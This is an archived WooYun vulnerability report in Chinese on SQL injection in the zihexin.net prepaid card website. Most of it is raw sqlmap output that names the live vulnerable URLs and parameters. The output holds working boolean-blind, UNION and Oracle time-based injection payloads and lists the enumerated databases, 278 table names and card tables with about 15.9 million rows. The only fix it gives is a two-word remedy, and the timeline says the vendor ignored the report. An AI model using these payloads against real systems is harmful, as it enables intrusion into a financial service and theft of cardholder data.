乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-03-28: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-05-12: 厂商已经主动忽略漏洞,细节向公众公开
金融安全之资和信商通卡官网全网数据沦陷/多枚注入打包/设计大量卡号数据
http://www.zihexin.net/brand/offersinfor.do?action=4&ID=540055http://www.zihexin.net/client/unit.do?method=info&STORE_ID=4000105444100022" -D "ZHXDB_SETTLE
---Place: GETParameter: ID Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: action=4&ID=540055' AND 1957=1957 AND 'AQSu'='AQSu Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: action=4&ID=540055' UNION ALL SELECT CHR(113)||CHR(103)||CHR(102)||CHR(115)||CHR(113)||CHR(78)||CHR(117)||CHR(70)||CHR(102)||CHR(110)||CHR(98)||CHR(105)||CHR(108)||CHR(100)||CHR(106)||CHR(113)||CHR(111)||CHR(122)||CHR(122)||CHR(113),NULL FROM DUAL-- ---web application technology: Nginx, JSPback-end DBMS: Oracleavailable databases [24]:[*] APEX_030200[*] APPQOSSYS[*] BILL[*] CTXSYS[*] DBSNMP[*] EXFSYS[*] FLOWS_FILES[*] IGNITE_M[*] MDSYS[*] OLAPSYS[*] ORDDATA[*] ORDSYS[*] OUTLN[*] OWBSYS[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] WMSYS[*] XDB[*] ZHXBK[*] ZHXBK1[*] ZHXDB_SETTLE[*] ZHXDB_SETTLE_BANK---Place: GETParameter: STORE_ID Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: method=info&STORE_ID=4000105444100022' AND 6214=6214 AND 'mamy'='mamy Type: UNION query Title: Generic UNION query (NULL) - 20 columns Payload: method=info&STORE_ID=-9947' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(108)||CHR(114)||CHR(120)||CHR(113)||CHR(113)||CHR(72)||CHR(111)||CHR(101)||CHR(82)||CHR(98)||CHR(71)||CHR(86)||CHR(77)||CHR(65)||CHR(113)||CHR(105)||CHR(97)||CHR(105)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- Type: AND/OR time-based blind Title: Oracle AND time-based blind (heavy query) Payload: method=info&STORE_ID=4000105444100022' AND 2158=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'OrDw'='OrDw---web application technology: Nginx, JSPback-end DBMS: OracleDatabase: ZHXDB_SETTLE[278 tables]+-------------------------------+| ACC_CARDTYPE_MARKET_BAK || AQUA_EXPLAIN_110408 || AQUA_EXPLAIN_115312 || CREATE_MERCH_TEMP || ETL_TRANS_DEF || FENGHUANGHUI || MOBILE_SEARCH_CARD_LOG || MOBILE_VISIT_LOG || STARBUCKS || STARBUCKS_TMP || STA_VIP_ACCCARDTYPE || STA_VIP_ACCCARDTYPEMARKET || STA_VIP_ACCHANDPAYLOG || STA_VIP_ACCMARKETFILE || STA_VIP_ACCMARKETFILEHANDFEE || STA_VIP_ACCPOSFILE || STA_VIP_ACCSIGNCOMPANY || STA_VIP_ACCVALIDCARD || STA_VIP_ACCWASTEBOOK || STA_VIP_ACTICARD || STA_VIP_ACTIMERCHANT || STA_VIP_ACTIMERCHANTTERMINAL || STA_VIP_ACTIPLAN || STA_VIP_ACTIROLE || STA_VIP_ACTIROLEDETAIL || STA_VIP_ALLCANCELTABLE || STA_VIP_CARDTYPE || STA_VIP_CARDTYPEMARKET || STA_VIP_JIFENACCUMWASTEBOOK || STA_VIP_MARKETFILE || STA_VIP_POSFILE || STA_VIP_STRIKELOG || STA_VIP_VALIDCARD || STA_VIP_WASTEBOOK || STA_XSHQ_WASTEBOOK || STA_XSH_WASTEBOOK || STL_BATCHDETAIL || STL_BATCHDETAIL_CP || STL_BATCHDETAIL_SAMSUNG || STL_DEFFTHAN_CPL || STL_DEFFTHAN_VIP || STL_DEFFTHAN_VIP_HIS || STL_DETAIL_NO_SETTLE_MERCH || STL_SYS_CARDTYPE || STL_SYS_CARDTYPE4MERCHANT || STL_SYS_SETTLECARDCATG || STL_SYS_SETTLECARDTYPE || STL_SYS_SETTLECARDTYPE_SPEC || STL_SYS_TRANS || STL_SYS_TRANSMESG || STL_VIP_REVERSAL || STL_VIP_TRANS || STL_VIP_TRANS_HIS || STL_VIP_TRANS_HIS_TEMP || STL_VIP_TRANS_TEMP || ST_ACCOUNT || ST_ACCOUNT_MERCH || ST_ACC_CARDTYPE_AREA || ST_AE_ETL_1824 || ST_AE_ETL_9824 || ST_AE_ETL_9825 || ST_AE_ETL_ACTPAYMENTINFO || ST_AE_ETL_ARBITRATION || ST_AE_ETL_BATCHDETAIL || ST_AE_ETL_CARDBAL || ST_AE_ETL_CHARGEBACK || ST_AE_ETL_CHARGEBACK_APP || ST_AE_ETL_CHARGE_DETAIL || ST_AE_ETL_CHARGE_THAWINFO || ST_AE_ETL_COLLECT || ST_AE_ETL_COLLECT_DETAIL || ST_AE_ETL_COLLECT_MAIN || ST_AE_ETL_COUNTRY || ST_AE_ETL_CURRENCY || ST_AE_ETL_CUST_CARD || ST_AE_ETL_DATAEXPR || ST_AE_ETL_EXCHANGE_RATE || ST_AE_ETL_FILERETURNS || ST_AE_ETL_MCC_RAL || ST_AE_ETL_PARAM || ST_AE_ETL_PPRDATA || ST_AE_ETL_PPRINFO || ST_AE_ETL_RETURNAMT || ST_AE_ETL_SETTLE_FEE || ST_AE_ETL_STATISTIC || ST_AE_ETL_SYSCB_CLEAR || ST_AE_ETL_SYSCHARGEBACK || ST_AE_ETL_THAWINFO || ST_AE_ETL_TRANS || ST_AE_ETL_TRANS_1110 || ST_AE_ETL_TRANS_1240 || ST_AE_ETL_TRANS_1644 || ST_AE_ETL_TRANS_CANCEL || ST_AE_ETL_TRANS_FEE || ST_AE_ETL_TRANS_MAIN || ST_AE_ETL_TRANS_TJ || ST_AE_ETL_UNFREEZE_LOG || ST_AGENTRECEIPT_MERCHINFO || ST_ANNOUNCE_INFO || ST_APPLICTION_USERS || ST_AREA || ST_AWARD || ST_AWARD_UPDATE || ST_BAM_ACCOUNTBALANCE || ST_BAM_BANK_ACCOUNT || ST_BAM_BANK_ACTUALDETAIL || ST_BAM_BANK_CUSTOMERMANAGER || ST_BAM_BANK_INFO || ST_BAM_BANK_PARAM || ST_BATCH_LOG || ST_BILL || ST_BILL_PRINT || ST_BRANCH || ST_BRANCH_INFO || ST_CANCEL_CONSTRACT || ST_CARD_TYPE || ST_CHANNEL || ST_CHINA_BANK || ST_CLOSE_STORE || ST_COLLECT || ST_COMPANY || ST_CONSUMER || ST_CREATE_MERCH_INFO || ST_CREDIT_PRINT || ST_EXAMINE || ST_EXAMINE_CHANGE || ST_EXAMINE_CHANGE_BAK || ST_EXAMINE_INFO || ST_EXAMINE_TERM || ST_FIX_ACCOUNT || ST_HEADOFFICE_INFO || ST_HEADOFFICE_MERCH || ST_INVOICE || ST_INVOICE_COLLECT || ST_INVOICE_INFO || ST_INVOICE_MANAGE || ST_INVOICE_MANAGE2 || ST_JKLINFO || ST_JKL_TRANS || ST_KAMEN_CARD_PRODUCT_RELA || ST_KAMEN_PRODUCT || ST_KAMEN_RATE_INFO || ST_KAMEN_SETTLE_INFO || ST_MANUAL_REFUND || ST_MCC_NEW || ST_MCC_NEW_RH_2016 || ST_MCC_NEW_RH_TMP || ST_MERCH_ACCOUNT || ST_MERCH_ACTIVATE || ST_MERCH_APP_ID || ST_MERCH_BASIC_INFO || ST_MERCH_CHANGE || ST_MERCH_LOCK || ST_MERCH_PAYMENT || ST_MERCH_PAYMENT_HIS || ST_MERCH_PAYMENT_LOG || ST_MERCH_PICTURE || ST_MERCH_PREPAYMENT || ST_MERCH_PREPAYMENT_STATISTIC || ST_MERCH_PRINT || ST_MERCH_TERM_REQ || ST_MOBILE_FEE || ST_NETWORKPAY || ST_NT_BANK_ACTUALDETAIL || ST_NT_BANK_FEE || ST_NT_BANK_INFO || ST_NT_BANK_RECEIVECOLLECT || ST_NT_BANK_RECEIVE_STATISTIC || ST_NT_ETL_BATCHDETAIL || ST_NT_ETL_BATCHDETAIL_ERROR || ST_NT_ETL_BATCHDETAIL_MAIN || ST_NT_ETL_BATCHDETAIL_NORATE || ST_NT_ETL_DZ_BCM_SOA || ST_NT_ETL_DZ_CMB_SOA || ST_NT_ETL_DZ_ICBC_HIST || ST_NT_ETL_DZ_ICBC_TDAY || ST_NT_ETL_DZ_SPDB_SOA || ST_NT_ETL_TRANS_BANK || ST_NT_ETL_TRANS_MAIN || ST_PAY || ST_PAYABLE_MESSAGE || ST_PAY_AUTOBAK || ST_PAY_AUTOBAK_BAK || ST_PAY_BAK || ST_PAY_CARDTYPE_41 || ST_PAY_DETAIL || ST_PAY_DETAIL08 || ST_PAY_DETAIL_TEST || ST_PAY_DETAIL_TMP || ST_PAY_TMP || ST_POWER || ST_PROC_LOG || ST_RATE || ST_RATE_AMT || ST_RATE_CHANGE || ST_ROLE || ST_ROLE_CONSUMER || ST_ROLE_POWER || ST_ROLE_SETTLE || ST_RUN_LOG || ST_SETTLE_LIST_BATCH || ST_SETTLE_LIST_DAY || ST_SETTLE_LIST_NORATE || ST_SETTLE_MESSAGE || ST_SETTLE_NEWLIST || ST_SETTLE_NEWLIST_TMP || ST_SETTLE_NEWLIST_TMP1 || ST_SETTLE_NEWLIST_TMP2 || ST_SETTLE_NEWLIST_TMP3 || ST_STORE_CLOSE || ST_SUM_CARDDAY || ST_SUM_CARDDAY_TMP || ST_SUM_CARDDAY_VIEW || ST_SUM_CARDDAY_VIEW_PAY || ST_SUM_CARDDAY_VIEW_TEMP1 || ST_SUNING_INFO || ST_TERM || ST_TERM_AUDITFLAG || ST_TERM_AUDITFLAG_HRS || ST_TERM_AUDITINFO || ST_TERM_CHANGE || ST_TERM_CLASS || ST_TERM_COMP || ST_TERM_MODIFY || ST_TERM_YUMINFO || ST_TERM_ZHONGBAI || ST_TON_HLP || ST_XBK_SETTLE_DATE || ST_YUM_ERROR_INFO || ST_YUM_SETTLE_INFO || T1 || TEST1 || TEST2 || TEST3 || TEST4 || TEST_GGS_FOR_DADING || TEST_MDPOS || TEST_ZH || TMP_RUN_LOG || WEB_ACTIVITY || WEB_ACTIVITY_STORE || WEB_ADVISE || WEB_AWARD || WEB_BANK || WEB_BANNER || WEB_CHANGE_USER || WEB_COMPANY_CITY || WEB_DISCOUNT || WEB_GROUP || WEB_ISSUE_ACTIVITY || WEB_ISSUE_AWARD || WEB_ISSUE_BANNER || WEB_ISSUE_DISCOUNT || WEB_ISSUE_LOGO || WEB_ISSUE_NOTICE || WEB_ISSUE_STORE || WEB_ISSUE_STORE_20140928 || WEB_LABEL || WEB_LABEL_MCC || WEB_LOGO || WEB_LOGO_STORE || WEB_MCC || WEB_MERCH || WEB_MERCH_SITE || WEB_NEWS || WEB_NOTICE || WEB_NOTICE_STORE || WEB_POSITION || WEB_SENSITIVE || WEB_SITE || WEB_SITE_BANK || WEB_STORE || WEB_STORE_20140928 || WEB_STORE_LABEL || WEB_WORD_LOG || WEM_TMP || WEM_TMP2 || YUM_20150506 |+-------------------------------+---web application technology: Nginx, JSPback-end DBMS: OracleDatabase: ZHXBK+------------------+---------+| Table | Entries |+------------------+---------+| ACC_CARD_BANK | 15945274 || ACC_VALID_CARD | 15945272 || ACC_CARD_SQL_LOG | 3880 || USER_TABEL | 2 || ACC_CARD_TYPE | 1 || EDITION_FILE | 1 |+------------------+---------+
参数过滤
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)